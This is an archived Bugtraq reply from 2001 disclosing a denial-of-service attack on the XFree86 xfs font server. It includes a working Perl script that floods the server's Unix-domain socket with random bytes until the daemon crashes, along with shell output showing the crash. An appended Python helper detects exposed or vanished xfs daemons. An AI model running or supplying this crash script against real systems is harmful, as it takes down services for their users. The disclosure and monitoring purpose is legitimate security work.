[20961] in bugtraq
Re:XFree86-xfs-4.0.1-1 DoS
daemon@ATHENA.MIT.EDU (Mathias Dybvik)
Mon Jun 11 13:36:45 2001
From: "Mathias Dybvik" <tmdybvik@hotmail.com>
To: bugtraq@securityfocus.com
Cc: grok@mhd.pl
Date: Mon, 11 Jun 2001 00:53:16 -0400
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F98EybqfAj81EYtN3Is000056d0@hotmail.com>
I forgot to mention that the TCP attack against the font server is
(obviously) only applicable to font-servers listening to TCP. (Which is
probably only the case for systems serving x-terminals.)
Thanks to people who pointed this out.
If we want to kill a font-server running on the Mandrake/Redhat/whatever
*default* setup, we have to send the garbage to the Unix-Domain socket
instead.
I've only tested this on Mandrake 8.0; on my system it takes about 5-10
seconds before xfs dies. I apologize if the script is ugly; I'm a PHB, not
a developer, and the few lines below are more Perl than I've written all
year.
Mathias
[user@userland ~]$ ps -ax|grep xfs
3690 ? S 0:00 xfs -port -1 -daemon -user xfs
3723 pts/2 S 0:00 grep xfs
[user@userland ~]$ ./xfdeath
[user@userland ~]$ ps -ax|grep xfs
3780 pts/1 S 0:00 grep xfs
[user@userland ~]$ cat xfdeath
#!/usr/bin/perl -w
use Socket;
use strict;
my ($grab, $line, $garbagebyte,$i,$STOP);
sub darned {
    $STOP=1;
}
open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!";
$SIG{'PIPE'} = 'darned';
for ($i = 0; $i < 1000; ++$i)
{
    $STOP=0;
    $grab = shift || '/tmp/.font-unix/fs-1';
    socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0) || die "socket: $!";
    connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!";
    while (!$STOP) {
        read(GARBAGE, $garbagebyte, 1);
        print ".";
        print A_SOCKET $garbagebyte;
    }
}
exit;
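Added example, not part of the original post: a small monitoring helper that reads `ps -ax` style snapshots like the ones above, reports whether each xfs daemon is exposed over TCP or only on its Unix-domain socket, and flags a daemon that disappeared between two snapshots. The sample snapshots are constructed from the post's output; treating `-port -1` as "no TCP listener", the default port 7100 and all function names are assumptions of this example.

```python
# Constructed samples modelled on the ps output shown in the post.
BEFORE = """\
 3690 ?        S      0:00 xfs -port -1 -daemon -user xfs
 3723 pts/2    S      0:00 grep xfs
"""
AFTER = """\
 3780 pts/1    S      0:00 grep xfs
"""
TCP_SAMPLE = "  412 ?        S      0:00 /usr/X11R6/bin/xfs -port 7100 -daemon\n"

DEFAULT_TCP_PORT = 7100  # assumption: port used when no -port argument is given


def xfs_processes(ps_text):
    """Return [(pid, argv)] for xfs daemons found in `ps -ax` style output."""
    found = []
    for line in ps_text.splitlines():
        fields = line.split(None, 4)  # PID TTY STAT TIME COMMAND
        if len(fields) < 5 or not fields[0].isdigit():
            continue  # header line or truncated row
        argv = fields[4].split()
        # Match on the executable name only, so "grep xfs" is not counted.
        if argv and argv[0].rsplit("/", 1)[-1] == "xfs":
            found.append((int(fields[0]), argv))
    return found


def transport(argv):
    """Classify the listener from -port (assumption: negative means no TCP)."""
    port = DEFAULT_TCP_PORT
    if "-port" in argv[:-1]:
        try:
            port = int(argv[argv.index("-port") + 1])
        except ValueError:
            return "unknown"  # malformed argument: have a human look at it
    return "unix-only" if port < 0 else "tcp/%d" % port


def vanished(before_text, after_text):
    """PIDs of xfs daemons present in the first snapshot but not the second."""
    still_running = {pid for pid, _ in xfs_processes(after_text)}
    return [pid for pid, _ in xfs_processes(before_text) if pid not in still_running]


if __name__ == "__main__":
    for pid, argv in xfs_processes(BEFORE + TCP_SAMPLE):
        print("xfs pid %d listens on: %s" % (pid, transport(argv)))
    for pid in vanished(BEFORE, AFTER):
        print("ALERT: xfs pid %d is gone; font service is down" % pid)
```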